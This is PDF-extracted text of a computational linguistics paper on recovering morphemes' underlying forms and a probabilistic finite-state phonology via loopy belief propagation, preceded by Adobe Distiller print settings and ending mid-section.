/CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_zecvwmdvwvacdcb7oko24oq6fy ---- Modeling Word Forms Using Latent Underlying Morphs and Phonology Ryan Cotterell and Nanyun Peng and Jason Eisner Department of Computer Science, Johns Hopkins University {ryan.cotterell,npeng1,eisner}@jhu.edu Abstract The observed pronunciations or spellings of words are often explained as arising from the “underlying forms” of their mor- phemes. These forms are latent strings that linguists try to reconstruct by hand. We propose to reconstruct them automatically at scale, enabling generalization to new words. Given some surface word types of a concatenative language along with the abstract morpheme sequences that they ex- press, we show how to recover consistent underlying forms for these morphemes, together with the (stochastic) phonology that maps each concatenation of underly- ing forms to a surface form. Our technique involves loopy belief propagation in a nat- ural directed graphical model whose vari- ables are unknown strings and whose con- ditional distributions are encoded as finite- state machines with trainable weights. We define training and evaluation paradigms for the task of surface word prediction, and report results on subsets of 7 languages. 1 Introduction How is plurality expressed in English? Compar- ing cats ([kæts]), dogs ([dOgz]), and quizzes ([kwIzIz]), the plural morpheme evidently has at least three pronunciations ([s], [z], [Iz]) and at least two spellings (-s and -es). Also, consider- ing singular quiz, perhaps the “short exam” mor- pheme has multiple spellings (quizz-, quiz-). Fortunately, languages are systematic. The re- alization of a morpheme may vary by context but is largely predictable from context, in a way that generalizes across morphemes. In fact, gener- ative linguists traditionally posit that each mor- pheme of a language has a single representation shared across all contexts (Jakobson, 1948; Ken- stowicz and Kisseberth, 1979, chapter 6). How- ever, this string is a latent variable that is never observed. Variation appears when the phonology of the language maps these underlying represen- tations (URs)—in context—to surface represen- tations (SRs) that may be easier to pronounce. The phonology is usually described by a grammar that may consist of either rewrite rules (Chomsky and Halle, 1968) or ranked constraints (Prince and Smolensky, 2004). We will review this framework in section 2. The upshot is that the observed words in a language are supposed to be explainable in terms of a smaller underlying lexicon of morphemes, plus a phonol- ogy. Our goal in this paper is to recover the lexicon and phonology (enabling generalization to new words). This is difficult even when we are told which morphemes are expressed by each word, be- cause the unknown underlying forms of the mor- phemes must cooperate properly with one another and with the unknown phonological rules to pro- duce the observed results. Because of these in- teractions, we must reconstruct everything jointly. We regard this as a problem of inference in a di- rected graphical model, as sketched in Figure 1. This is a natural problem for computational lin- guistics. Phonology students are trained to puzzle out solutions for small datasets by hand. Children apparently solve it at the scale of an entire lan- guage. Phonologists would like to have grammars for many languages, not just to study each lan- guage but also to understand universal principles and differences among related languages. Auto- matic procedures would recover such grammars. They would also allow comprehensive evaluation and comparison of different phonological theories (i.e., what inductive biases are useful?), and would suggest models of human language learning. Solving this problem is also practically impor- tant for NLP. What we recover is a model that can generate and help analyze novel word forms,1 which abound in morphologically complex lan- guages. Our approach is designed to model sur- 1An analyzer would require a prior over possible analyses. Our present model defines just the corresponding likelihoods, i.e., the probability of the observed word given each analysis. rizajgn z eɪʃ#n dæmn rizajgn#eɪʃ#n rizajgn#z dæmn#z dæmn#eɪʃ#n rˌɛ.zɪg.nˈeɪ.ʃ#n ri.zˈajnz dæmz dˌæm.nˈeɪ.ʃ#n rˌɛzɪgnˈeɪʃn̩ rizˈajnz dˈæmz dˌæmnˈeɪʃn̩ 1) Morpheme URs 2) Word URs 3) Word SRs Concatenation (e.g.) Phonology (PFST) Phonetics resignation resigns damns damnation 2 M 2 U 2 S 4) Word Observations Figure 1: Our model as a Bayesian network, in which surface forms arise from applying phonology to a concatenation of underlying forms. Shaded nodes show the observed surface forms for four words: resignation, resigns, damns, and damnation. The graphical model encodes their morphological relationships using latent forms. Each morpheme UR at layer 1 is generated by the lexicon model Mφ (a probabilistic finite-state automaton). These are concatenated into various word URs at layer 2. Each SR at layer 3 is generated using the phonology model Sθ (a probabilistic finite-state transducer). Layer 4 derives observable phonetic forms from layer 3. This deletes unpronounced symbols such as syllable boundaries, and translates the phonemes into an observed phonetic, articulatory, or acoustic representation. However, our present paper simply merges layers 3 and 4: our layer 3 does not currently make use of any unpronounced symbols (e.g., syllable boundaries) and we observe it directly. face pronunciations (as needed for text-to-speech and ASR). It might also be applied in practice to model surface spellings (as needed for MT on text). Good morphological analysis has been used to improve NLP tasks such as machine translation, parsing, and NER (Fraser et al., 2012; Hohensee and Bender, 2012; Yeniterzi, 2011). Using loopy belief propagation, this paper at- tacks larger-scale learning problems than prior work on this task (section 8). We also develop a new evaluation paradigm that examines how well an inferred grammar predicts held-out SRs. Un- like previous algorithms, we do not pre-restrict the possible URs for each morpheme to a small or structured finite set, but use weighted finite-state machines to reason about the infinite space of all strings. Our graphical model captures the standard assumption that each morpheme has a single UR, unlike some probabilistic learners. However, we do not try to learn traditional ordered rules or con- straint rankings like previous methods. We just search directly for a probabilistic finite-state trans- ducer that captures likely UR-to-SR mappings. 2 Formal Framework We urge the reader to begin by examining Fig- ure 1, which summarizes our modeling approach through an example. The upcoming sections then give a formal treatment with details and discus- sion. Section 2 describes the random variables in Figure 1’s Bayesian network, while section 3 describes its conditional probability distributions. Sections 4–5 give inference and learning methods. A morpheme is a lexical entry that pairs form with content (Saussure, 1916). Its form is a morph—a string of phonemes. Its content is a bundle of syntactic and/or semantic properties.2 Note that in this paper, we are nonstandardly us- ing “morph” to denote an underlying form. We assume that all underlying and surface represen- tations can be encoded as strings, over respective alphabets Σu and Σs. This would be possible even for autosegmental representations (Kornai, 1995). A language’s phonological system thus consists of the following components. We denote each im- portant set by a calligraphic letter. We use the cor- responding uppercase letter to denote a function to that set, the corresponding lowercase letter as a variable that ranges over the set’s elements, and a distinguished typeface for specific elements. • A is a set of abstract morphemes such as �qu�i�z and �p�l�u�r$a�l. These are atoms, not strings. • M = Σ∗u is the space of possible morphs: concrete UR strings such as /kwIz/ or /z/. • M : A → M is the lexicon that maps each morpheme a to an underlying morph m = M(a). We will find M(a) for each a. • U = (Σu ∪{#})∗ is the space of underlying representations for words, such as /kwIz#z/. • U : M∗ → U combines morphs. A word is specified by a sequence of morphemes ~a = a1,a2, . . ., with concrete forms mi = M(ai). 2This paper does not deal with the content. However, note that a single morpheme might specify a conjunction or disjunction of multiple properties, leading to morphological phenomena such as fusion, suppletion, or syncretism. That word’s underlying form is then u = U(m1,m2, . . .) ∈U. • S = Σ∗s is the space of surface representa- tions for words, such as [kwIzIz]. • S : U → S is the phonology. It maps an underlying form u to its surface form s. We will find this function S along with M. We assume in this paper that U simply con- catenates the sequence of morphs, separating them by the morph boundary symbol #: u = U(m1,m2, . . .) = m1#m2# · · · . However, see section 4.3 for generalizations. The overall system serves to map an (abstract) morpheme sequence ~a ∈ A∗ to a surface word s ∈ S. Crucially, S acts on the underlying form u of the entire word, not one morph at a time. Hence its effect on a morph may depend on con- text, as we saw for English pluralization. For ex- ample, S(/kwIz#s/) = [kwIzIz]—or if we were to apply our model to orthography, S(/quiz#s/) = [quizzes]. S produces a single well-formed sur- face form, which is not arbitrarily segmented as [quiz-zes] or [quizz-es] or [quizze-s]. 3 Probability Model Our goal is to reconstruct the lexicon M and mor- phophonology S for a given language. We there- fore define prior probability distributions over them. (We assume Σu, Σs,A,U are given.) For each morpheme a ∈ A, we model the morph M(a) ∈M as an IID sample from a proba- bility distribution Mφ(m).3 This model describes what sort of underlying forms appear in the lan- guage’s lexicon. The phonology is probabilistic in a similar way. For a word with underlying form u ∈ U, we pre- sume that the surface form S(u) is a sample from a conditional distribution Sθ(s | u). This single sample appears in the lexical entry of the word type and is reused for all tokens of that word. The parameter vectors φ and θ are specific to the language being generated. Thus, under our gener- ative story, a language is created as follows: 1. Sample φ and θ from priors (see section 3.4). 2. For each a ∈A, sample M(a) ∼ Mφ. 3. Whenever a new abstract word~a = a1,a2 · · · must be pronounced for the first time, con- struct u as described in section 2, and sample S(u) ∼ Sθ(· | u). Reuse this S(u) in future. 3See section 3.3 for a generalization to Mφ(m | a). Note that we have not specified a probability distribution over abstract words ~a, since in this paper, these sequences will always be observed. Such a distribution might be influenced by the se- mantic and syntactic content of the morphemes. We would need it to recover the abstract words if they were unobserved, e.g., when analyzing novel word forms or attempting unsupervised training. 3.1 Discussion: Why probability? A language’s lexicon M and morphophonology S are deterministic, in that each morpheme has a sin- gle underlying form and each word has a single surface form. The point of the language-specific distributions Mφ and Sθ is to aid recovery of these forms by capturing regularities in M and S. In particular, Sθ constitutes a theory of the regu- lar phonology of the language. Its high-probability sound changes are the “regular” ones, while irreg- ularities and exceptions can be explained as occa- sional lower-probability choices. We prefer a the- ory Sθ that has high likelihood, i.e., it assigns high probability (≈ 1) to each observed form s given its underlying u. In linguistic terms, we prefer pre- dictive theories that require few exceptions. In the linguistic community, the primary mo- tivation for probabilistic models of phonology (Pierrehumbert, 2003) has been to explain “soft” phenomena: synchronic variation (Sankoff, 1978; Boersma and Hayes, 2001) or graded acceptabil- ity judgments on novel surface forms (Hayes and Wilson, 2008). These applications are orthog- onal to our motivation, as we do not observe any variation or gradience in our present exper- iments. Fundamentally, we use probabilities to measure irregularity—which simply means unpre- dictability and is a matter of degree. Our objective function will quantitatively favor explanations that show greater regularity (Eisner, 2002b). A probabilistic treatment also allows rela- tively simple learning methods (e.g., Boersma and Hayes (2001)) since inference never has to back- track from a contradiction. Our method searches a continuous space of phonologies Sθ, all of which are consistent with every mapping S. That is, we always have Sθ(s | u) > 0 for all u,s, so our current guess of Sθ is always capable of explain- ing the observed words, albeit perhaps with low probability. Our EM learner tunes Sθ (and Mφ) so as to raise the probability of the observed sur- face forms, marginalizing over the reconstructed lexicon M of underlying forms. We do warn that w ɛ t ɾw ɛ rə Next Input Character Input Right Context Input Left Context Output Left Context Output Right Context Stochastic Choice Of Edit in Context C Figure 2: Illustration of a contextual edit process as it pro- nounces the English word wetter by transducing the under- lying /wEt#@r/ (after erasing #) to the surface [wER@r]. At the point shown, it is applying the “intervocalic alveolar flap- ping” rule, replacing /t/ in this context by applying SUBST(R). EM can get stuck at a local optimum; random restarts and simulated annealing are ways to es- cape such low-likelihood solutions, much as back- tracking escapes zero-likelihood solutions. 3.2 Mapping URs to SRs: The phonology Sθ We currently model Sθ(s | u) as the probability that a left-to-right stochastic contextual edit pro- cess (Figure 2) would edit u into s. This probabil- ity is a sum over all edit sequences that produce s from u—that is, all s-to-u alignments. Stochastic contextual edit processes were de- scribed by Cotterell et al. (2014). Such a pro- cess writes surface string s ∈ Σ∗s while reading the underlying string u ∈ Σ∗u . If the process has so far consumed some prefix of the input and pro- duced some prefix of the output, it will next make a stochastic choice among 2|Σs| + 1 possible ed- its. Edits of the form SUBST(c) or INSERT(c) (for c ∈ Σs) append c to the output string. Edits of the form SUBST(c) or DELETE will (also) consume the next input phoneme; if no input phonemes remain, the only possible edits are INSERT(c) or HALT. The stochastic choice of edit, given context, is governed by a conditional log-linear distribution with feature weight vector θ. The feature functions may look at a bounded amount of left and right input context, as well as left output context. Our feature functions are described in section 6. Our normalized probabilities Sθ(s | u) can be computed by a weighted finite-state transducer, a crucial computational property that we will ex- ploit in section 4.2. As Cotterell et al. (2014) explain, the price is that our model is left/right- asymmetric. The inability to condition directly on the right output context arises from local normal- ization, just like “label bias” in maximum entropy Markov models (McCallum et al., 2000). With certain fancier approaches to modeling Sθ, which we leave to future work, this effect could be miti- gated while preserving the transducer property. 3.3 Generating URs: The lexicon model Mφ In our present experiments, we use a very simple lexicon model Mφ, so that the burden falls on the phonology Sθ to account for any language-specific regularities in surface forms. This corresponds to the “Richness of the Base” principle advocated by some phonologists (Prince and Smolensky, 2004), and seems to yield good generalization for us. We say all URs of the same length have the same probability, and the length is geometrically dis- tributed with mean (1/φ) − 1. This is a 0-gram model with a single parameter φ ∈ (0, 1], namely Mφ(m) = ((1 −φ)/|Σu|)|m| ·φ. It would be straightforward to experiment with other divisions of labor between the lexicon model and phonology model. A 1-gram model for Mφ would also model which underlying phonemes are common in the lexicon. A 2-gram model would model the “underlying phonotactics” of morphs, though phonological processes would still be needed at morph boundaries. Such models are the probabilistic analogue of morpheme struc- ture constraints. We could further generalize from Mφ(m) to Mφ(m | a), to allow the shape of the morph m to be influenced by a’s content. For example, Mφ(m | a) for English might describe how nouns tend to have underlying stress on the first syllable; similarly, Mφ(m | a) for Arabic might capture the fact that underlying stems tend to consist of 3 consonants; and across languages, Mφ(m | a) would prefer affixes to be short. Note that we will always learn a language’s Mφ jointly with its actual lexicon M. Loosely speak- ing, the parameter vector φ is found from easily reconstructed URs in M; then Mφ serves as a prior that can help us reconstruct more difficult URs. 3.4 Prior Over the Parameters For φ, which is a scalar under our 0-gram model, our prior is uniform over (0, 1]. We place a spher- ical Gaussian prior on the vector θ, with mean ~0 and a variance σ2 tuned by coarse grid search on dev data (see captions of Figures 3–4). The Gaussian favors phonologies that are sim- ple in the sense that they have few strongly weighted features. A grammar that refers once to the natural class of voiced consonants (section 6), which captures a generalization, is preferred to an equally descriptive grammar that refers separately to several specific voiced consonants. If it is hard to tell whether a change applies to round or back vowels (because these properties are strongly cor- related in the training data), then the prior resists grammars that make an arbitrary choice. It prefers to “spread the blame” by giving half the weight to each feature. The change is still probable for round back vowels, and moderately probable for other vowels that are either round or back. 4 Inference We are given a training set of surface word forms s that realize known abstract words ~a. We aim to reconstruct the underlying morphs m and words u, and predict new surface word forms s. 4.1 A Bayesian network For fixed θ and φ, this task can be regarded as marginal inference in a Bayesian network (Pearl, 1988). Figure 1 displays part of a network that en- codes the modeling assumptions of section 3. The nodes at layers 1, 2, and 3 of this network repre- sent string-valued random variables in M, U, and S respectively. Each variable’s distribution is con- ditioned on the values of its parents, if any. In particular, layer 1 represents the unknown M(a) for various a. Notice that each M(a) is softly constrained by the prior Mφ, and also by the fact that it must help produce various observed surface words via Sθ. Each underlying word u at level 2 is a concate- nation of its underlying morphs M(ai) at level 1. Thus, the topology at levels 1–2 is given by super- vision. We would have to learn this topology if the word’s morphemes ai were not known. Our approach captures the unbounded genera- tive capacity of language. In contrast to Dreyer and Eisner (2009) (see section 8), we have defined a directed graphical model. Hence new unob- served descendants can be added without chang- ing the posterior distribution over the existing vari- ables. So our finite network can be viewed as a subgraph of an infinite graph. That is, we make no closed-vocabulary assumption, but implicitly in- clude (and predict the surface forms of) any un- observed words that could result from combining morphemes, even morphemes not in our dataset. While the present paper focuses on word types, we could extend the model to consider tokens as well. In Figure 1, each phonological surface type at layer 3 could be observed to generate 0 or more noisy phonetic tokens at layer 4, in contexts that call for the morphemes expressed by that type. 4.2 Loopy belief propagation The top two layers of Figure 1 include a long undirected cycle (involving all 8 nodes and all 8 edges shown). On such “loopy” graphical models, exact inference is in general uncomputable when the random variables are string-valued. However, Dreyer and Eisner (2009) showed how to substi- tute a popular approximate joint inference method, loopy belief propagation (Murphy et al., 1999). Qualitatively, what does this do on Figure 1?4 Let u denote the leftmost layer-2 node. Midway through loopy BP, u is not yet sure of its value, but is receiving suggestions from its neighbors. The stem UR immediately above u would like u to start with something like /rizajgn#/.5 Meanwhile, the word SR immediately below u encourages u to be any UR that would have a high probability (under Sθ) of surfacing as [rEzIgn#eIS@n]. So u tries to meet both requirements, guessing that its value might be something like /rizajgn#eIS@n/ (the product of this string’s scores under the two mes- sages to u is relatively high). Now, for U to have produced something like /rizajgn#eIS@n/ by stem- suffix concatenation, the suffix’s UR must have been something like /eIS@n/. u sends a message saying so to the third node in layer 1. This induces that node (the suffix UR) to inform the rightmost layer-2 node that it probably ends in /#eIS@n/ as well—and so forth, iterating until convergence. Formally, the loopy BP algorithm iteratively updates messages and beliefs. Each is a func- tion that scores possible strings (or string tuples). Dreyer and Eisner (2009)’s key insight is that these messages and beliefs can be represented using weighted finite-state machines (WFSMs), and fur- thermore, loopy BP can compute all of its updates using standard polytime finite-state constructions. 4.3 Discussion: The finite-state requirement The above results hold when the “factors” that de- fine the graphical model are themselves expressed 4Loopy BP actually passes messages on a factor graph de- rived from Figure 1. However, in this informal paragraph we will speak as if it were passing messages on Figure 1 directly. 5Because that stem UR thinks its own value is something like /rizajgn/—based on the messages that it is currently re- ceiving from related forms such as /rizajgn#z/, and from Mφ. as WFSMs. This is true in our model. The fac- tors of section 4.1 correspond to the conditional distributions Mφ, U, and Sθ that respectively se- lect values for nodes at layers 1, 2, and 3 given the values at their parents. As section 3 models these, for any φ and θ, we can represent Mφ as a 1-tape WFSM (acceptor), U as a multi-tape WFSM, and Sθ as a 2-tape WFSM (transducer).6 Any other WFSMs could be substituted. We are on rather firm ground in restricting to finite-state (regular) models of Sθ. The apparent regularity of natural-language phonology was first observed by Johnson (1972), so computational phonology has generally preferred grammar formalisms that compile into (unweighted) finite-state machines, whether the formalism is based on rewrite rules (Kaplan and Kay, 1994) or constraints (Eisner, 2002a; Riggle, 2004). Similarly, U could be any multi-tape finite-state relation,7 not just concatenation as assumed in sec- tion 2. This would allow our framework to handle templatic 